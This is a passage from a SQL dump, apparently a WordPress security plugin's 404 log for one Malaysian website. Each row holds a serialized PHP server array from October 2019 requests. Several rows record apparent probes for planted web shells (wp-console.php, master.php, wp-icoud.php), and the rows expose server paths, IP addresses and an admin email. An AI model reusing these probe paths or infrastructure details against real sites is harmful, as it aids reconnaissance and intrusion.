Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/master.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:11:\"/master.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaoHWo9Mb4wNxKVbgmY66AAAAkE\";s:19:\"REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/master.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:11:\"/master.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaoHWo9Mb4wNxKVbgmY66AAAAkE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"178.208.83.20\";s:11:\"REMOTE_PORT\";s:5:\"33073\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/master.php\";s:10:\"SCRIPT_URL\";s:11:\"/master.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaoHWo9Mb4wNxKVbgmY66AAAAkE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571424090.6861\";s:12:\"REQUEST_TIME\";s:10:\"1571424090\";}}','notice','2019-10-18 18:41:33','2019-10-18 18:41:31',34970176,36780680,'https://bintara.com.my/master.php',1,0,'178.208.83.20'),(28343,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:123:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/66.0.3359.181 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"209.99.134.22\";s:11:\"REMOTE_PORT\";s:5:\"41163\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaoI8o9Mb4wNxKVbgmY8vAAAAko\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571424499.0526\";s:12:\"REQUEST_TIME\";s:10:\"1571424499\";}}','notice','2019-10-18 18:48:21','2019-10-18 18:48:19',34917176,36722416,'https://bintara.com.my/?page_id=18',1,0,'209.99.134.22'),(28344,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=11\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3451.0 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=11\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"223.206.243.89\";s:11:\"REMOTE_PORT\";s:5:\"54260\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaoJoPivEQeUaFKlM5ZvHwAAAI8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571424672.6634\";s:12:\"REQUEST_TIME\";s:10:\"1571424672\";}}','notice','2019-10-18 18:51:16','2019-10-18 18:51:13',35312520,37108376,'https://bintara.com.my/?page_id=11',1,0,'223.206.243.89'),(28345,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"/information-security/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:195:\"Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:44:\"https://bintara.com.my/information-security/\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/information-security/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaorSI9Mb4wNxKVbgmZZNwAAAk0\";s:12:\"REDIRECT_URL\";s:22:\"/information-security/\";s:11:\"REMOTE_ADDR\";s:13:\"157.55.39.164\";s:11:\"REMOTE_PORT\";s:5:\"25173\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:44:\"https://bintara.com.my/information-security/\";s:10:\"SCRIPT_URL\";s:22:\"/information-security/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaorSI9Mb4wNxKVbgmZZNwAAAk0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571433288.8912\";s:12:\"REQUEST_TIME\";s:10:\"1571433288\";}}','notice','2019-10-18 21:14:52','2019-10-18 21:14:49',34192216,35994720,'https://bintara.com.my/information-security/',1,0,'157.55.39.164'),(28346,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:50:\"/wp-includes/SimplePie/Content/Type/wp-console.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:72:\"https://bintara.com.my/wp-includes/SimplePie/Content/Type/wp-console.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:50:\"/wp-includes/SimplePie/Content/Type/wp-console.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaovSo9Mb4wNxKVbgmZcCwAAAkM\";s:19:\"REDIRECT_SCRIPT_URI\";s:72:\"https://bintara.com.my/wp-includes/SimplePie/Content/Type/wp-console.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:50:\"/wp-includes/SimplePie/Content/Type/wp-console.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaovSo9Mb4wNxKVbgmZcCwAAAkM\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"178.128.126.221\";s:11:\"REMOTE_PORT\";s:5:\"58070\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:72:\"https://bintara.com.my/wp-includes/SimplePie/Content/Type/wp-console.php\";s:10:\"SCRIPT_URL\";s:50:\"/wp-includes/SimplePie/Content/Type/wp-console.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaovSo9Mb4wNxKVbgmZcCwAAAkM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571434314.9767\";s:12:\"REQUEST_TIME\";s:10:\"1571434314\";}}','notice','2019-10-18 21:31:58','2019-10-18 21:31:55',35397096,37205352,'https://bintara.com.my/wp-includes/SimplePie/Content/Type/wp-console.php',1,0,'178.128.126.221'),(28347,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:50:\"/wp-includes/SimplePie/Content/Type/wp-console.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:72:\"https://bintara.com.my/wp-includes/SimplePie/Content/Type/wp-console.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:50:\"/wp-includes/SimplePie/Content/Type/wp-console.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaovZdW6eau1YwLtPYH1aAAAAoA\";s:19:\"REDIRECT_SCRIPT_URI\";s:72:\"https://bintara.com.my/wp-includes/SimplePie/Content/Type/wp-console.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:50:\"/wp-includes/SimplePie/Content/Type/wp-console.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaovZdW6eau1YwLtPYH1aAAAAoA\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"178.128.126.221\";s:11:\"REMOTE_PORT\";s:5:\"59194\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:72:\"https://bintara.com.my/wp-includes/SimplePie/Content/Type/wp-console.php\";s:10:\"SCRIPT_URL\";s:50:\"/wp-includes/SimplePie/Content/Type/wp-console.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaovZdW6eau1YwLtPYH1aAAAAoA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571434342.0288\";s:12:\"REQUEST_TIME\";s:10:\"1571434342\";}}','notice','2019-10-18 21:32:23','2019-10-18 21:32:22',34972168,36779456,'https://bintara.com.my/wp-includes/SimplePie/Content/Type/wp-console.php',1,0,'178.128.126.221'),(28348,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:88:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0,gzip(gfe)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"49824\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xao1m9W6eau1YwLtPYH4BAAAAoo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571435932.0274\";s:12:\"REQUEST_TIME\";s:10:\"1571435932\";}}','notice','2019-10-18 21:58:54','2019-10-18 21:58:52',35310896,37116312,'https://bintara.com.my/?page_id=18',1,0,'137.74.4.69'),(28349,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"223.206.243.10\";s:11:\"REMOTE_PORT\";s:5:\"65261\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xao2-tW6eau1YwLtPYH4hAAAAoc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571436286.5279\";s:12:\"REQUEST_TIME\";s:10:\"1571436286\";}}','notice','2019-10-18 22:04:49','2019-10-18 22:04:46',35311936,37109968,'https://bintara.com.my/?page_id=18',1,0,'223.206.243.10'),(28350,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:153:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.2717.400 QQBrowser/9.6.11133.400\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"223.206.243.10\";s:11:\"REMOTE_PORT\";s:5:\"51766\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XapFvgZfHioVGWbjloHYTQAAAMY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571440062.5121\";s:12:\"REQUEST_TIME\";s:10:\"1571440062\";}}','notice','2019-10-18 23:07:45','2019-10-18 23:07:42',35412264,37226064,'https://bintara.com.my/?page_id=18',1,0,'223.206.243.10'),(28351,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:50:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-icoud.php\";s:14:\"CONTENT_LENGTH\";s:2:\"28\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 6.1; 